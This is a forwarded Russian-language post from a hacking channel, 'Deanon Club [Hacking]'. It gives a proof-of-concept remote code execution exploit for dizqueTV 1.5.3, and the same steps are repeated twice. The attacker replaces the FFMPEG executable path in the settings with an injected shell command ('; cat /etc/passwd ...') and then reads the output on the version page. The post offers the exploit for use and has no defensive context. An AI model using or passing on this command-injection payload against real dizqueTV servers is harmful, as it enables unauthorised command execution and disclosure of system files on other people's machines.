Forward from: Deanon Club [Hacking]
dizqueTV 1.5.3 - Удаленное выполнение кода (RCE)
1. перейдите по адресу http://localhost/#! /settings
2. Теперь перейдите в настройки ffmpeg и измените путь к исполняемому файлу FFMPEG на: "; cat /etc/passwd && echo 'poc'"
3. нажмите «Обновить»
4. Теперь перейдите по ссылке http://localhost/#! /version или щелкните по версии, и вы увидите содержимое файла /etc/passwd
#Exploits
1. перейдите по адресу http://localhost/#! /settings
2. Теперь перейдите в настройки ffmpeg и измените путь к исполняемому файлу FFMPEG на: "; cat /etc/passwd && echo 'poc'"
3. нажмите «Обновить»
4. Теперь перейдите по ссылке http://localhost/#! /version или щелкните по версии, и вы увидите содержимое файла /etc/passwd
#Exploits